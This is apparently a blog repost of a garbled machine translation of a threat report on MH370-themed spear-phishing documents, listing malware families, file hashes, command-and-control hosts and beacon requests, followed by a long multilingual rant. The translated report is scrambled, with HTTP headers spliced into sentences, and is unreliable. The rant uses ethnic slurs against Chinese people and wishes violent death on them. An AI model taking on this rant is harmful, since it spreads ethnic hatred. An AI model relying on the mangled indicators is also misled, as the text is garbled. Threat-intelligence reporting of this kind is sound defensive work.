| a093440e75ff4fef256f5a9c1106069a | a692dca39e952b61501a278ebafab97f | xl.findmy [。] PW |
| 125dbbb742399ec2c39957920867ee60 | a692dca39e952b61501a278ebafab97f | uu.yahoomail [。] PW |
| 52408bffd295b3e69e983be9bdcdd6aa | a692dca39e952b61501a278ebafab97f | net.googlereader [。] PW |
該Plat1誘劑
於2014年3月10日,我們觀察到的另一個示例,利用CVE-2012-0158,名為“MH370班機可以人員身份信息的.doc”(MD5:4ff2156c74e0a36d16fa4aea29f38ff8),這大致可以翻譯為“MH370飛行人員的身份信息”。 這是由惡意的Word文檔,我們發現作為Trojan.APT.Plat1下降了惡意軟件,開始通過TCP通過端口80打開後的剝削是空白的誘餌文件航標59.188.253.216。 該惡意文檔下降以下植入物:
C:\ Documents和Settings \管理員\應用數據\英特爾\ ResN32.dll(MD5:2437f6c333cf61db53b596d192cafe64)通過這個惡意文件刪除的植入物都包含可用於查找相關的樣品的獨特的PDB路徑。 這些路徑如下:
C:\ Documents和Settings \管理員\應用數據\英特爾\〜y.dll(MD5:d8540b23e52892c6009fdd5812e9c597)
E:\工作\ T5000 \ T5安裝\碼ResN \發布\ ResN32.pdb這個惡意軟件家族中更詳細地描述在這裡 。
F:\ WORK \ PROJECT \ T5安裝\ InstDll \發布\ InstDll.pdb
該Mongall /獵魚餌
另一個樣品借力失踪客機的主題就已經出現在3月12日,2014年惡意文件利用CVE-2012-0158和題為“缺少馬來西亞航空公司航班370.doc”(MD5:467478fa0670fa8576b21d860c1523c6)。 雖然延看起來像一個Microsoft Office .doc文件,它實際上是一個.html應用程序(HTA)的文件。 一旦攻擊成功,有效載荷使自己持續增加一個Windows快捷方式(.LNK)文件指向在開始菜單的“啟動”文件夾中的惡意軟件。 據信標出境到comer4s.minidns網[。]:8070。 網絡回調模式,如下圖所示,已知由研究者為“Mongall”或“獵”:
GET / 3010FC080 [刪除] HTTP / 1.1樣品也下降稱為“aa.doc”到臨時文件夾誘騙文件,並顯示如下所示的誘餌內容:
的User-Agent:Mozilla的/ 4.0(兼容; MSIE 6.0;威斯康星NT 5.0; .NET CLR 1.1.4322)
主持人:comer4s.minidns.net:8070
的Cache-Control:no-cache的
在“Tranchulas”魚餌
於 2014年3月18日題為“Malysia航空公司MH370由Pakistan.zip劫持”的樣品被送到一個ZIP文件 (MD5:7dff5c4ae1b1fea7ecbf7ab787da3468)包含偽裝成PDF文件在Windows屏幕保護程序文件 (MD5:b03edbb264aa0c980ab2974652688876)。 ZIP文件託管於199.91.173.43。 這個IP地址是以前使用託管惡意文件。
屏幕保護程序文件放置“winservice.exe”(MD5:828d4a66487d25b413cb19ef8ee7c783)的信標開始向199.91.173.45。 這個IP地址是以前用來舉辦了題為“obl_leaked_report.zip”文件(MD5:a4c7c79308139a7ee70aacf68bba814f)。
最初的燈塔對命令和控制服務器如下:
POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP / 1.1同樣的控制服務器被用在以前的活動 。
主持人:199.91.173.45
接受:* / *
內容長度:11
內容類型:應用程序/ x-WWW窗體-urlencoded
該活動頁面
最後一個惡意文件被視為濫用失踪370航班的故事3月18日,2014年本文件利用CVE-2012-0158和題為“MH370 PM聲明14年3月15日 - FINAL.DOC”(MD5:5e8d64185737f835318489fda46f31a6)。 本文下降了Backdoor.APT.Page植入物,並連接到122.10.89.85這兩個端口80和443端口80的初始航標交通為如下操作:
GET /18110143/page_32180701.html HTTP / 1.1結論
接受:* / *
餅乾:XX = 0; BX = 0
的User-Agent:Mozilla的/ 4.0(兼容; MSIE 8.0; Win32的)
主持人:122.10.89.85
連接:保持活動
的Cache-Control:no-cache的
編譯:無緩存
雖然許多APT者們採取了戰略性的Web妥協作為傳遞載體,很明顯,矛,通過基於電子郵件的附件或鏈接釣魚zip文件仍然深受許多威脅的行為,尤其是在與誘惑討論當前的媒體活動配對。 網絡維護者應當將這些事實變成他們的用戶培訓計劃,並提高警戒定期矛釣魚運動,它利用主題佔據了消息循環。
致謝:我們感謝納爾特維倫紐夫和帕特里克·奧爾森的支持,研究和分析,這些研究結果。
=========================================================================
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
===============================
Fireeye =
http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html&usg=ALkJrhhMUPhJiU6XIjrHalfPPWCDEymgQQ#more-4992
http://www.fireeye.com/kr/ko/
=======================================================================
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
le blog de FireEye = http://www.fireeye.com/fr/fr/
http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html&usg=ALkJrhhMUPhJiU6XIjrHalfPPWCDEymgQQ#more-4992
=======================================================================
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
======================================
http://www.fireeye.com/de/de/
http://www.fireeye.com/jp/ja/products-and-solutions/threat-protection-platform.html
===========================================================================
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
=========================
http://www.fireeye.com/jp/ja/
=============================================================================
'' chinaman rogue hackers are doing a bad thing to do,
Pretend goodness,, heart spiteful, Communist mainland also credible it ???
Look at yesterday's violence was arranged in Hong Kong triad police posing as peace
'' Umbrella campaign '' participants will be aware of the continent hybrids conspiracy, hehe.
No education / parenting Chinaman do not always standard "horse monkey"
Lower means so self-deception, not afraid of falling again by the international community for Fallon
'' The most fake country '' to ridicule ... haha ..
Look at those slaves Zhang claw Dengmu sort of true and false ???
Technology's taught me to look at my intellect have quality channels.
When the tube was Chinaman extinction.
Our aim, with Hong Kong students on the same side.
No matter what a mercenary corruption,
Remember human rights and dignity of most non-Yee
You must be framed hybrid Chinaman killed.! ''
For Hong Kong '' umbrella campaign '' peace warrior and write ``
Indistinct small Melody.blog Sincerely ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
''chinaman的流氓黑客,甚麽壞事都做盡,
假裝善良,,內心刻毒,大陸共產黨也可信的麼???
看看昨天被安排了的暴力黑社會警察假扮香港和平的
''雨傘運動''的參與者,便可得知大陸雜種的陰謀,嘿嘿.
沒教育/教養的支那人總要做些沒水準的"馬猴戲",
這般自欺欺人的低級手段,不怕又再被國際間倫落為
''最假國''來恥笑...哈哈..
看那些奴隸張爪瞪目有幾分真假???
科技年代我的智力教我看有質素的頻道.
管得支那人何時滅絕.
我們的宗旨,與香港學生們同一陣線.
無論那一個銅臭腐化,
記著人權和尊嚴最無議
誣陷你們的雜種支那人必死於非命.!''
為香港地區''雨傘運動''的和平戰士而寫``
缈小的 Melody.blog敬上~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
'악성 해커가 할 수있는 나쁜 일을하고있는 중국인'
그것은 또한 신뢰할 수있는 장점,, 마음 짓궂은, 공산주의 본토 척 ???
어제의 폭력 봐 평화로 위장 해 홍콩 트라이어드 경찰에 배치되었다
'참가자 도니는 다르게, 대륙 하이브리드의 음모를 알고있을 것입니다' '우산 캠페인'.
어떤 교육 / 육아 중국인은 항상 표준 "말 원숭이"하지 않는다
펄롱에 대한 국제 사회의 다시 떨어지는 두려워하지 않는 낮은 수단 그래서 자기기만,
'하하 ... 조롱에'대부분의 가짜 국가 '를'..
그 노예에서 장 참과 거짓의 Dengmu 정렬 발톱 봐 ???
기술의 내 지성을보고 품질 채널을 가지고 저를 가르쳤다.
때 튜브는 중국인 멸종했다.
같은 측면에서 홍콩 학생들과 함께 우리의 목표.
상관없이 용병 손상,
인간의 권리와 대부분의 비 유의 존엄성을 기억
당신은 프레임해야 하이브리드 중국인 사망.! ''
홍콩 ''우산 캠페인 ''평화의 전사 및 쓰기``들어
감사합니다 불명료 한 작은 Melody.blog ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
''Chinois pirates voyous font une mauvaise chose à faire,
Prétendre bonté,, cœur méchant, continentale communiste aussi crédible il ???
Regardez la violence d'hier a été organisée à Hong Kong la police de la triade se faisant passer pour la paix
'' Campagne Umbrella '' les participants seront au courant de la conspiration hybrides continent, hehe.
Pas d'éducation / parentalité Chinois ne le font pas toujours la norme "singe de cheval"
Moyen inférieur de manière auto-tromperie, n'a pas peur de tomber de nouveau par la communauté internationale pour Fallon
'' Le plus faux pays '' au ridicule ... haha ..
Consulter les esclaves Zhang griffe Dengmu sorte de vrai et de faux ???
Technologie m'a appris à regarder mon intellect disposer de voies de qualité.
Lorsque le tube était Chinois extinction.
Notre objectif, avec des étudiants de Hong Kong sur le même côté.
Peu importe ce qu'est un mercenaire corruption,
Rappelez droits de l'homme et de la dignité de la plupart des non-Yee
Chinois hybride Vous devez être encadrée tué.! ''
Pour Hong Kong '' campagne de parapluie '' guerrier de la paix et écrire ``
Indistinct petit Melody.blog Sincèrement ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
'、不正なハッカーが何を悪いことをやっている中国人'
それも信憑性の良さ,,心悪意、共産本土をふり???
昨日の暴力を見て、平和を装っ香港トライアッド警察に配置された
'参加者が笑、大陸ハイブリッドの陰謀を知っているであろう[傘キャンペーンを」。
いいえ教育/子育ての中国人は、必ずしも標準的な「馬の猿」やるん
ファロンのための国際社会が再び落下するのを恐れていない下位手段そう自己欺瞞、
'ハハ...嘲笑するには、'最も偽の国'を' ..
それらの奴隷で張は真と偽のDengmuソート爪見て???
テクノロジーのは、私の知性を見て品質のチャンネルを持っているように私に教えてくれました。
ときチューブは中国人の絶滅だった。
同じ側の香港の学生と私たちの目的は、。
どんなに何傭兵汚職、
人権とほとんどの非イーの尊厳を覚えている
あなたが額装されなければならないハイブリッド中国人が死亡した。! ''
香港''傘キャンペーン''平和の戦士と書き込み``用
敬具不明瞭な小Melody.blog〜
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
'' Chinese Schurken Hacker machen einen schlechte Sache zu tun,
Pretend Güte,, Herz gehässigen, kommunistischen Festland auch glaubwürdig es ???
Schauen Sie sich die Gewalt von gestern wurde in Hong Kong Triaden Polizei angeordnet, die sich als Friedens
'' Dachkampagne '' Teilnehmer werden sich noch an den Kontinent Hybriden Verschwörung, hehe.
Keine Bildung / Erziehung Chinesen nicht immer Standard "Pferd monkey"
Nieder Mittel so Selbstbetrug, keine Angst vor der internationalen Gemeinschaft für Fallon wieder fallen
'' Die meisten gefälschten Land '' der Lächerlichkeit ... haha ..
Blick auf diese Sklaven Zhang Krallen Dengmu Art von wahr und falsch ???
Technology mich gelehrt, an meinem Verstand zu suchen haben Qualitätsfernsehen .
Wenn das Rohr war Chinese Aussterben.
Unser Ziel, mit Hongkong Studenten auf der gleichen Seite.
Egal, was ein Söldner Korruption,
Angemeldet Menschenrechte und Würde der meisten nicht-Yee
Sie müssen gerahmt werden Hybrid Chinesen getötet.! ''
Für Hong Kong '' Dachkampagne '' Frieden Krieger und schreiben ``
Undeutlich kleine Melody.blog Grüßen ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
'' Ĉino fripono hackers faras malbonan aferon fari,
Pretend boneco,, koro rankora Komunista ĉeftero ankaŭ kredebla tio ???
Rigardu hieraŭa perforto estis aranĝitaj en Honkongo triada polico metante kiel paco
'' Umbrella kampanjo '' partoprenantoj konscii pri la kontinento hibridoj konspiro, hehe.
Neniu edukado / parenting ĉino ne ĉiam normo "ĉevalo simio"
Malsupra per tiom autoengaño, ne timas fali denove por la internacia komunumo por Fallon
'' La plej falsa lando '' ridinda ... haha ..
Rigardu tiujn sklavojn Zhang ungi Dengmu ia vera kaj falsa ???
Teknologio instru mi rigardi mia intelekto havos kvaliton kanaloj.
Kiam la tubo estis Ĥino formorto.
Nia celo, kun Hongkongo studentoj sur la sama flanko.
Neniu gravi kion mercenario korupto,
Memoru homaj rajtoj kaj digno de plej ne-Yee
Vi devas esti enmarcada hibrida ĉino mortigita.! ''
Por Hongkongo '' ombrelo kampanjo '' paco batalanto kaj skribi ``
Nedistinga malgrandaj Melody.blog Sincere ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
==============================
--BY Hacker News ---**Malaysia Flight MH370 tragedy abused Chinese hackers spy attacks !!-?? [Wednesday, March 26, 2014,,Editor" Wang Wei]] -
--BY Hacker News---**馬來西亞航班MH370的悲劇被中國黑客間諜的攻擊濫用 ?!!?-[週三,2014年3月26日,, Editor"汪煒 ]]-
--BY 해커 뉴스---**말레이시아 항공 MH370 비극 학대 중국어 해커는 공격을 감시! - ?? [2014년 3월 26일 (수요일), 편집기 "왕 웨이]] -
---Hacker--par Nouvelles ---**Malaisie vol MH370 tragédie abusé de hackers chinois espionnent attaques !!-??[Wednesday, 26 Mars 2014,, Editor "Wang Wei]] -
--BYハッカーニュース---**マレーシア航空MH370の悲劇虐待を受け、中国のハッカーが攻撃をスパイ!! - ?? [2014年3月26日(水曜日)、エディタ"王偉]] -
--Durch Hacker News --- ** Malaysia Flug MH370 Tragödie missbraucht Chinesische Hacker spionieren Angriffe !! - ?? [Mittwoch, 26. MÄRZ 2014, Editor "Wang Wei]] -
--BY Hacker News --- ** Malajzio Flugo MH370 tragedio trouzita ĉina hackers spioni atakoj !! - ?? [Merkredo, marto 26, 2014,, Redaktoro "Wang Wei]] -
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html
===Melody.Blog===FOLLOW ON===>/
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
沒有留言:
張貼留言
window.___gcfg = {
lang: 'zh-CN',
parsetags: 'onload'
};